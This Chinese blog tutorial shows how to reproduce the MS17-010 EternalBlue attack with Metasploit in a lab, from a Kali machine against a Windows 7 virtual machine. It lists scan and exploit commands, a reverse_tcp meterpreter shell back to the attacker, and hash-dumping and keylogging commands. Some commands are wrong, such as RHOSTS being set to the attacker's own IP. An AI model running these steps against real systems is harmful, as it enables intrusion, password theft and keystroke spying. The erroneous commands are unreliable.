您的位置:首页 > 其它

使用msf复现ms17-010永恒之蓝

2020-04-24 10:50 387 查看

**** 复现永恒之蓝****

一,准备工作:

1. kali系统
可以直接装在物理机上,也可以装在VMware虚拟机上。(个人推荐装在虚拟机上)
2. 信息收集工作:
1)获取目标机地址:192.168.1.68
我在这里用的是win7的虚拟机,查找win7的IP:按下win+R后输入cmd进入终端,输入ipconfig查看IP地址。
2)获取攻击机地址:192.168.1.6
这里指kali系统的IP,在终端输入ifconfig查看。

二,配置ms17-010
使用msf需要先启动数据库:
命令在终端输入systemctl start postgresql
如果嫌每次都要启动太麻烦可以设置开机自启动:
命令:system enable postgresql

1. 下面进入meatsploit框架:

进入命令:msfconsole 。                显示msf5>  表示成功进入。

2. 首先查找ms17-010所有的模块
我们可以看到下面的模块:

攻击一台设备,先要进行测试,了解我们所攻击的目标机是否存在这个漏洞。
1)使用辅助模块进行测试
查找
使用

2)配置模块信息

查看命令:show  options
配置目标机IP命令:set  RHOSTS 192.168.1.68

3)执行run或exploit

测试目标机存在漏洞后,开始正式攻击。back退出模块。

1. 查找ms17-010的攻击模块。

命令:msf5>search ms17-010
找到exploit / windows / smb / ms17_010_eternalblue

2. 加载漏洞的攻击模块。
使用攻击模块

3.查看攻击模块需要设置的参数。

4)设置目标机命令:set RHOSTS 192.168.1.6


攻击只是一种手段,最重要的是要拿到对方的权限。我们可以利用攻击载荷模块(payload)让目标机在受到攻击后,返回一个shell给攻击机,让它们之间建立一个通道。
1)查找我们要用的攻击载荷模块。

命令:search  payload / windows / x64 / meterpreter / reverse_tcp

2)将它加载进攻击模块。

命令:set  payload  windows / x64 / meterpreter / reverse_tcp

3)设置攻击机(LHOST)用于接收会话

命令:set LHOST 192.168.1.6
最后执行run或exploit进行攻击。

成功后可以输入sysinfo查看目标机的系统信息。

可使用一下命令:
help 查看帮助
getsystem 提升权限
shell 进入对方的命令终端
hashdump 获取密码hash值
keyscan_start 打开记录键盘
keyscan_dump 记录键盘
keyscan_stop 关闭记录键盘

  • 点赞 1
  • 收藏
  • 分享
  • 文章举报
lvlheike 发布了2 篇原创文章 · 获赞 1 · 访问量 154 私信 关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: